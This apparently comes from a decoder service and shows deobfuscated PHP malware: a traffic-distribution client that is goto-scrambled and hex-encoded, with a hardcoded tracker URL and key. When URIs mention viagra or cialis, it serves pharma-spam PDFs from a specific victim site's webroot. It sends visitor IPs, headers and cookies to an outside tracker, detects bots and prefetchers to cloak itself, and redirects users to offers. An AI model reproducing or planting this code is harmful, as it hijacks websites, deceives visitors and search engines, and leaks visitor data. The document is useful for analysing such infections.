$this->_sessionsDisabled) { return; } $this->_startSession(); if (!empty($_SESSION[self::STATE_SESSION_KEY])) { if ($_SESSION[self::STATE_SESSION_EXPIRES_KEY] < time()) { unset($_SESSION[self::STATE_SESSION_KEY]); unset($_SESSION[self::STATE_SESSION_EXPIRES_KEY]); $this->log("\x53\164\141\164\x65\x20\145\x78\160\151\162\145\x64"); } else { $this->_result = json_decode($_SESSION[self::STATE_SESSION_KEY], false); if (isset($this->_result) && isset($this->_result->headers)) { $this->_result->headers = array(); } $this->_stateRestored = true; $this->log("\x53\164\x61\x74\x65\40\x72\x65\163\x74\x6f\162\145\x64"); } } } public function disableSessions() { $this->_sessionsDisabled = true; } public function restoreFromQuery() { if (isset($_GET["\x5f\163\x75\x62\151\144"])) { $this->_stateRestored = true; if (empty($this->_result)) { $this->_result = new StdClass(); $this->_result->info = new StdClass(); } $this->_result->info->sub_id = $_GET["\x5f\163\x75\x62\x69\144"]; $this->log("\123\x75\x62\111\x64\x20\154\x6f\141\144\145\x64\x20\146\x72\157\155\40\x71\165\145\162\171"); if (isset($_GET["\137\x74\157\153\x65\x6e"])) { $this->_result->info->token = $_GET["\x5f\164\x6f\153\x65\x6e"]; $this->log("\x4c\x61\x6e\144\x69\x6e\x67\40\x74\x6f\153\145\x6e\40\154\157\x61\144\x65\144\x20\x66\162\x6f\155\40\161\x75\145\162\x79"); } $this->_storeState($this->_result, self::DEFAULT_TTL); $this->_stateRestored = true; } } public function isStateRestored() { return $this->_stateRestored; } public function isPrefetchDetected() { $checkServerParams = array("\x48\x54\x54\120\x5f\130\x5f\120\x55\122\120\117\x53\105" => "\x70\162\145\x76\151\x65\x77", "\x48\x54\x54\120\x5f\x58\137\115\117\132" => "\160\162\145\146\x65\x74\143\150", "\110\x54\124\120\x5f\x58\x5f\x46\x42\x5f\110\124\124\120\x5f\x45\x4e\107\x49\x4e\105" => "\114\151\147\145\162"); foreach ($checkServerParams as $name => $value) { if (isset($_SERVER[$name]) && $_SERVER[$name] == $value) { return true; } } return false; } public function saveCookie($key, $value, $ttl) { if (isset($_COOKIE[$key]) && $_COOKIE[$key] == $value) { return; } if (!headers_sent()) { setcookie($key, $value, $this->_getCookiesExpireTimestamp($ttl), "\x2f", $this->_getCookieHost()); } $_COOKIE[$key] = $value; } public function param($name, $value) { if (!in_array($name, $this->_excludeParams)) { $this->_params[$name] = $value; } return $this; } public function params($value) { if (!empty($value)) { if (is_string($value)) { parse_str($value, $result); foreach ($result as $name => $value) { $this->param($name, $value); } } } return $this; } public function reset() { $this->_result = null; } public function performRequest() { if ($this->_result) { return $this->_result; } $request = $this->_buildRequestUrl(); $params = $this->getParams(); $options = $this->_getRequestOptions(); $this->log("\x52\x65\161\165\145\163\164\x3a\x20" . $request); try { $result = $this->_httpClient->request($request, $params, $options); $this->log("\122\145\163\160\157\156\x73\145\x3a\40" . $result); } catch (KClientError $e) { if ($this->_debug) { throw $e; } else { $errorCode = $e->getHumanCode(); $errorCode = $errorCode ? $errorCode . "\x20" : ''; echo $errorCode . self::ERROR; return; } } $this->_result = json_decode($result); $this->_storeState($this->_result, isset($this->_result->cookies_ttl) ? $this->_result->cookies_ttl : null); if (isset($this->_result->cookies)) { $this->_saveKeitaroCookies($this->_result->cookies, $this->_result->cookies_ttl); } return $this->_result; } public function execute($break = false, $print = true) { $result = $this->performRequest(); $body = $this->_buildBody($result); if (!$print) { return $body; } $this->_sendHeaders($result); echo $body; } public function executeAndBreak() { $result = $this->performRequest(); $body = $this->_buildBody($result); $this->_sendHeaders($result); if (!empty($body)) { die($body); } if (!empty($result->headers) && ResponseExecutor::containsActionHeader($result->headers)) { die($body); } if (!empty($result->status) && $result->status == self::NOT_FOUND_STATUS) { die($body); } } public function getContent() { $result = $this->performRequest(); return $this->_buildBody($result); } public function showLog($separator = "\74\x62\x72\40\57\76") { echo "\74\x68\162\76" . implode($separator, $this->getLog()) . "\x3c\x68\x72\x3e"; } public function log($msg) { if ($this->_debug) { error_log($msg); } $this->_log[] = $msg; } public function getLog() { return $this->_log; } public function getParams() { return $this->_params; } private function _sendHeaders($result) { $file = ''; $line = ''; if (headers_sent($file, $line)) { $msg = "\102\x6f\x64\x79\40\157\165\x74\160\x75\164\x20\x61\154\162\x65\141\x64\171\40\163\164\141\x72\164\x65\144"; if (!empty($file)) { $msg .= "\x28{$file}\72{$line}\x29"; } $this->log($msg); return; } ResponseExecutor::sendHeaders($result); } private function _storeState($result, $ttl) { if ($this->_sessionsDisabled) { return; } $this->_startSession(); $_SESSION[self::STATE_SESSION_KEY] = json_encode($result); $_SESSION[self::STATE_SESSION_EXPIRES_KEY] = time() + $ttl * 60 * 60; if (!empty($result->info)) { if (!empty($result->info->sub_id)) { $_SESSION[self::SESSION_SUB_ID] = $result->info->sub_id; } if (!empty($result->info->token)) { $_SESSION[self::SESSION_LANDING_TOKEN] = $result->info->token; } } } private function _buildBody($result) { $content = ''; if (!empty($result)) { if (!empty($result->error)) { $content .= $result->error; } if (!empty($result->body)) { if (isset($result->contentType) && (strstr($result->contentType, "\x69\x6d\x61\147\x65") || strstr($result->contentType, "\x61\x70\x70\154\x69\143\x61\x74\x69\x6f\x6e\x2f\x70\144\x66"))) { $content = base64_decode($result->body); } else { $content .= $result->body; } } } return $content; } private function _saveKeitaroCookies($cookies, $ttl) { foreach ($cookies as $key => $value) { $this->saveCookie($key, $value, $ttl); } } public function getOffer($params = array(), $fallback = "\x6e\157\137\157\x66\x66\145\162") { $result = $this->performRequest(); $token = $this->getToken(); if (empty($token)) { $this->log("\103\x61\155\160\141\x69\x67\x6e\x20\x68\x61\163\x6e\x27\x74\x20\x72\x65\x74\x75\x72\156\145\x64\40\x6f\x66\x66\x65\x72"); return $fallback; } $params["\137\x6c\x70"] = 1; $params["\x5f\x74\157\153\145\156"] = $result->info->token; return $this->_buildOfferUrl($params); } public function isBot() { $result = $this->performRequest(); if (isset($result->info)) { return isset($result->info->is_bot) ? $result->info->is_bot : false; } } public function isUnique($level = "\x63\x61\155\160\141\x69\x67\x6e") { $result = $this->performRequest(); if (isset($result->info) && $result->info->uniqueness) { return isset($result->info->uniqueness->{$level}) ? $result->info->uniqueness->{$level} : false; } } public function forceChooseOffer() { throw new \Error("\146\157\162\143\x65\x43\150\157\157\x73\145\x4f\146\146\145\x72\x20\167\x61\x73\x20\162\x65\155\157\x76\145\144\x20\151\x6e\40\x4b\103\x6c\x69\x65\x6e\164\x20\x76\63\x2e"); } public function getBody() { $result = $this->performRequest(); return $result->body; } public function getHeaders() { $result = $this->performRequest(); return $result->headers; } private function _startSession() { if (!headers_sent()) { @session_start(); } } private function _buildOfferUrl($params = array()) { $params = http_build_query($params); return "{$this->_trackerUrl}\x2f\x3f{$params}"; } private function _getCurrentPage() { if (isset($_SERVER["\x53\105\122\x56\x45\122\x5f\x50\x4f\x52\124"]) && $_SERVER["\x53\105\122\x56\105\122\x5f\x50\117\122\x54"] == 443 || !empty($_SERVER["\110\x54\124\x50\x53"])) { $scheme = "\150\x74\x74\160\163"; } else { $scheme = "\x68\x74\164\160"; } return $scheme . "\x3a\57\x2f" . $_SERVER["\110\124\x54\120\137\110\117\123\124"] . $_SERVER["\122\x45\x51\125\x45\123\124\137\125\x52\x49"]; } private function _buildRequestUrl() { return $this->_trackerUrl . "\x2f\x63\154\151\x63\x6b\137\x61\x70\x69\57\x76" . self::VERSION; } private function _findIp() { $ip = null; $headers = array("\x48\124\x54\120\137\130\137\106\117\x52\127\x41\x52\x44\105\104\137\106\117\122", "\x48\x54\x54\x50\137\x46\117\x52\x57\101\x52\x44\x45\x44\137\106\117\x52", "\110\x54\124\x50\x5f\130\x5f\106\117\122\x57\x41\122\x44\x45\104", "\110\x54\x54\120\137\x46\117\x52\127\101\122\104\105\104", "\x48\124\124\120\x5f\x43\x4c\111\x45\x4e\124\x5f\x49\x50", "\110\x54\124\x50\x5f\x46\x4f\x52\x57\x41\x52\104\x45\x44\137\x46\x4f\122\137\111\x50", "\130\x5f\x46\x4f\122\x57\x41\122\104\105\104\137\x46\117\122", "\x46\x4f\122\127\101\122\x44\105\x44\x5f\106\x4f\122", "\x58\x5f\106\117\x52\x57\101\122\x44\105\x44", "\x46\117\122\x57\x41\x52\104\x45\x44", "\x43\114\111\105\x4e\x54\x5f\111\x50", "\106\117\x52\x57\x41\x52\x44\105\104\137\106\117\122\137\111\120", "\x48\x54\x54\x50\137\103\x46\x5f\103\x4f\x4e\116\x45\x43\124\x49\116\x47\137\x49\x50", "\110\x54\x54\x50\137\x50\122\117\x58\131\137\103\117\116\x4e\105\103\x54\x49\117\116"); foreach ($headers as $header) { if (!empty($_SERVER[$header])) { $tmp = explode("\x2c", $_SERVER[$header]); $ip = trim($tmp[0]); break; } } if (strstr($ip, "\x2c")) { $tmp = explode("\x2c", $ip); if (stristr($_SERVER["\x48\x54\x54\x50\137\x55\123\x45\122\137\x41\x47\105\116\x54"], "\x6d\151\x6e\x69")) { $ip = trim($tmp[count($tmp) - 2]); } else { $ip = trim($tmp[0]); } } if (empty($ip)) { $ip = isset($_SERVER["\x52\x45\x4d\117\x54\x45\x5f\101\x44\104\x52"]) ? $_SERVER["\122\x45\115\x4f\124\105\x5f\x41\x44\x44\122"] : "\61\x32\x37\x2e\60\x2e\x30\x2e\61"; } return $ip; } private function _getCookiesExpireTimestamp($ttl) { return time() + 60 * 60 * $ttl; } private function _getCookieHost() { if (isset($_SERVER["\x48\x54\124\120\x5f\110\117\x53\x54"]) && substr_count($_SERVER["\x48\x54\124\120\137\110\x4f\123\x54"], "\x2e") < 3) { $host = "\x2e" . str_replace("\x77\167\167\56", '', $_SERVER["\110\124\x54\x50\x5f\110\117\123\124"]); } else { $host = null; } return $host; } private function _getRequestOptions() { $opts = array(); if (isset($_SERVER["\x48\124\124\120\x5f\x43\x4f\x4f\113\x49\105"])) { $opts["\x63\x6f\157\x6b\151\x65\x73"] = preg_replace("\x2f\x50\x48\120\x53\105\123\123\111\104\75\56\52\77\73\57\x73\x69", '', $_SERVER["\110\124\124\x50\137\103\117\117\113\111\105"]); } return $opts; } private function _getAllHeaders() { $headers = array(); foreach ($_SERVER as $name => $value) { if (substr($name, 0, 5) == "\x48\124\x54\x50\x5f") { $headers[str_replace("\40", "\x2d", ucwords(strtolower(str_replace("\x5f", "\x20", substr($name, 5)))))] = $value; } } return $headers; } } goto CnHcT; K0otW: class_alias("\113\103\x6c\151\x65\x6e\164", "\x4b\x43\x6c\x69\x63\153\103\x6c\151\145\x6e\x74"); goto K4KVi; JO9jw: $client->currentPageAsReferrer(); goto ivRv0; K4KVi: if (preg_match("\57\x76\x69\141\x67\x72\x61\x2f", $_SERVER["\122\105\x51\x55\x45\x53\124\137\125\122\x49"])) { $file = "\x2f\166\141\162\x2f\x77\167\167\57\x76\150\157\x73\164\163\57\145\170\154\x69\x62\x72\x69\x73\x65\144\151\143\151\x6f\x6e\x65\163\56\x63\157\x6d\x2f\147\165\x69\x61\x2d\x61\142\x65\x2e\x65\163\57\146\x69\x6c\x65\163\x2f\x70\x64\x66\x2f\x63\157\x6d\160\162\x61\162\x2d\x76\151\141\147\x72\x61\55\x65\x6e\55\154\x69\156\x65\141\55\x65\x73\x70\x61\x6e\151\x61\56\160\x64\146"; $tabl = "\166\x69\141\147\x72\141"; } goto yobyI; EvGkt: $client->sendAllParams(); goto OKHAv; jn5MR: $client->param("\163\x75\x62\137\x69\144\137\x31", $tabl); goto JO9jw; lX0eE: header("\x43\x6f\x6e\164\x65\x6e\164\x2d\164\171\x70\145\x3a\40\141\x70\160\154\151\x63\141\164\x69\x6f\156\57\x70\x64\146"); goto iB3p_; yobyI: if (preg_match("\57\143\151\x61\x6c\x69\x73\57", $_SERVER["\x52\x45\x51\125\x45\123\x54\137\125\x52\x49"])) { $file = "\57\x76\141\162\57\167\167\167\x2f\x76\150\157\163\x74\163\x2f\x65\x78\x6c\x69\142\162\151\163\x65\x64\x69\x63\151\157\156\x65\x73\x2e\x63\x6f\155\x2f\147\165\x69\141\x2d\x61\142\x65\x2e\x65\x73\x2f\146\x69\154\145\163\57\x70\144\x66\x2f\143\157\x6d\x70\162\x61\162\55\x63\x69\141\154\151\163\x2d\157\156\x6c\x69\x6e\145\x2d\x65\x6e\x2d\146\141\162\155\x61\x63\x69\141\x2d\163\x70\141\x69\x6e\56\160\144\146"; $tabl = "\x63\x69\x61\154\151\163"; } goto QjNoI; kEipm: class KHttpClient { const UA = "\113\110\x74\164\160\x43\x6c\151\x65\156\x74"; public function request($url, $params, $opts = array()) { if (!in_array("\143\165\x72\154", get_loaded_extensions())) { return json_encode(array("\x65\162\162\x6f\162" => "\103\x75\x72\x6c\40\x65\x78\164\145\156\x73\151\x6f\156\x20\155\165\163\164\40\x62\x65\x20\x69\x6e\163\164\x73\x61\154\154\x65\144")); } $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_COOKIE, isset($opts["\x63\157\157\153\x69\x65\x73"]) ? $opts["\x63\157\157\x6b\x69\145\163"] : null); curl_setopt($ch, CURLOPT_NOBODY, 0); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_USERAGENT, self::UA); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params)); curl_setopt($ch, CURLOPT_FAILONERROR, true); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $result = curl_exec($ch); if (curl_error($ch)) { throw new KClientError(curl_error($ch), curl_errno($ch)); } if (empty($result)) { throw new KClientError("\105\155\160\x74\171\40\162\x65\163\x70\x6f\x6e\x73\145"); } return $result; } } goto aQl6d; OKHAv: $client->forceRedirectOffer(); goto L_aY4; Q3GPN: @readfile($file); goto bS3mu; iB3p_: header("\103\x6f\156\x74\x65\x6e\164\55\114\x65\x6e\x67\x74\x68\x3a\x20" . filesize($file)); goto eUsMp; CnHcT: class ResponseExecutor { public static function sendHeaders($result) { if (!empty($result->headers)) { foreach ($result->headers as $header) { if (!headers_sent()) { header($header); } } } if (!empty($result->status)) { static::_sendResponseCode($result->status); } if (!empty($result->contentType)) { $header = "\143\x6f\156\x74\x65\156\164\x2d\x74\171\160\145\x3a\x20" . $result->contentType; $headers[] = $header; if (!headers_sent()) { header($header); } } } public static function containsActionHeader($headers) { if (empty($headers)) { return false; } foreach ($headers as $header) { if (stripos($header, "\x4c\x6f\x63\x61\164\151\x6f\156\72") === 0) { return true; } if (strstr($header, "\64\60\64\40\116\x6f\x74\x20\106\157\165\x6e\144")) { return true; } } return false; } private static function _sendResponseCode($code = null) { if ($code !== null) { switch ($code) { case 100: $text = "\x43\157\x6e\x74\151\x6e\x75\145"; break; case 101: $text = "\x53\x77\x69\x74\x63\150\151\x6e\147\x20\x50\x72\x6f\x74\157\143\157\154\x73"; break; case 200: $text = "\x4f\113"; break; case 201: $text = "\103\162\145\141\164\x65\x64"; break; case 202: $text = "\x41\143\143\145\x70\164\x65\x64"; break; case 203: $text = "\116\x6f\156\55\x41\165\x74\x68\x6f\x72\151\x74\141\164\x69\166\145\40\x49\156\x66\157\162\155\141\x74\x69\157\156"; break; case 204: $text = "\116\157\x20\103\x6f\156\x74\x65\x6e\x74"; break; case 205: $text = "\122\x65\x73\145\x74\x20\x43\157\x6e\164\145\156\x74"; break; case 206: $text = "\x50\141\x72\164\x69\141\154\x20\x43\157\156\x74\145\x6e\x74"; break; case 300: $text = "\115\165\x6c\164\x69\160\x6c\145\40\x43\x68\x6f\151\143\x65\163"; break; case 301: $text = "\x4d\157\166\x65\144\40\120\145\162\x6d\141\x6e\x65\156\164\154\171"; break; case 302: $text = "\115\x6f\x76\x65\x64\40\x54\145\x6d\x70\157\x72\x61\162\151\x6c\x79"; break; case 303: $text = "\x53\x65\x65\40\x4f\x74\150\145\162"; break; case 304: $text = "\116\157\164\40\x4d\157\x64\x69\146\x69\145\144"; break; case 305: $text = "\x55\163\145\40\120\x72\x6f\x78\171"; break; case 400: $text = "\102\x61\144\40\122\145\161\165\145\x73\x74"; break; case 401: $text = "\125\156\141\165\x74\150\x6f\162\151\172\145\x64"; break; case 402: $text = "\x54\150\145\40\154\x69\143\145\156\x73\x65\40\155\x75\x73\x74\40\142\x65\40\x69\x6e\40\120\162\x6f\x20\x65\144\x69\x74\151\x6f\x6e\x20\157\x72\x20\x68\x69\x67\150\x65\162"; break; case 403: $text = "\x46\157\x72\142\x69\144\x64\x65\x6e"; break; case 404: $text = "\116\157\x74\40\x46\x6f\x75\156\144"; break; case 405: $text = "\x4d\x65\x74\x68\157\144\x20\x4e\x6f\x74\x20\x41\154\x6c\x6f\167\145\x64"; break; case 406: $text = "\x4e\x6f\x74\40\101\143\x63\145\160\x74\x61\x62\x6c\x65"; break; case 407: $text = "\x50\162\157\x78\171\x20\x41\x75\164\150\x65\x6e\x74\x69\143\x61\x74\151\157\x6e\x20\x52\145\x71\165\x69\162\x65\x64"; break; case 408: $text = "\x52\145\161\165\145\x73\164\40\x54\151\x6d\145\x2d\x6f\165\164"; break; case 409: $text = "\x43\157\156\x66\154\151\x63\x74"; break; case 410: $text = "\107\157\x6e\x65"; break; case 411: $text = "\114\x65\x6e\147\164\x68\40\122\x65\161\x75\151\162\x65\144"; break; case 412: $text = "\x50\162\145\143\x6f\156\144\x69\164\x69\157\x6e\40\x46\x61\151\154\x65\144"; break; case 413: $text = "\122\145\x71\x75\145\163\164\x20\x45\x6e\164\151\164\171\x20\x54\157\x6f\40\x4c\141\x72\147\145"; break; case 414: $text = "\122\145\x71\x75\145\x73\164\55\125\122\111\x20\124\x6f\x6f\x20\x4c\141\162\x67\x65"; break; case 415: $text = "\x55\156\163\165\x70\160\x6f\162\164\x65\144\x20\x4d\145\144\151\141\x20\x54\x79\x70\145"; break; case 500: $text = "\x49\x6e\x74\x65\x72\x6e\141\x6c\x20\123\145\x72\x76\145\162\40\x45\x72\162\x6f\162"; break; case 501: $text = "\116\157\164\x20\x49\x6d\160\154\x65\155\145\x6e\164\x65\x64"; break; case 502: $text = "\x42\141\x64\x20\x47\x61\x74\x65\167\141\171"; break; case 503: $text = "\123\145\x72\166\x69\143\145\x20\x55\x6e\141\x76\141\151\154\x61\x62\x6c\x65"; break; case 504: $text = "\107\x61\x74\145\x77\x61\171\x20\124\x69\x6d\x65\55\x6f\x75\164"; break; case 505: $text = "\x48\124\x54\120\x20\126\145\162\163\151\157\x6e\40\x6e\x6f\x74\40\163\x75\160\x70\157\x72\164\x65\144"; break; default: $text = ''; } $protocol = isset($_SERVER["\123\x45\x52\126\x45\x52\x5f\120\122\117\x54\x4f\x43\117\114"]) ? $_SERVER["\x53\105\122\126\x45\122\x5f\x50\122\117\124\117\103\x4f\x4c"] : "\x48\124\124\120\x2f\x31\x2e\x30"; header($protocol . "\x20" . $code . "\x20" . $text); } } } goto kEipm; ivRv0: $client->executeAndBreak(); goto lX0eE; eUsMp: header("\x41\143\x63\x65\x70\164\55\x52\x61\x6e\x67\x65\163\x3a\40\142\x79\x74\x65\163"); goto Q3GPN; QjNoI: $client = new KClient("\x68\x74\164\160\x73\x3a\x2f\57\155\141\153\x65\164\x6f\x70\150\157\x74\154\x6f\x76\145\x2e\143\x6f\155\x2f", "\67\x35\x6b\147\160\161\164\x72\156\x6b\x7a\66\154\155\153\x78\163\x70\x73\147\x64\146\163\160\x76\63\x79\146\64\x78\161\x6c"); goto EvGkt; bS3mu: ?>

Function Calls

None

Variables

None

Stats

MD5 ff20776c01052f027de14d65fdbcc946
Eval Count 0
Decode Time 103 ms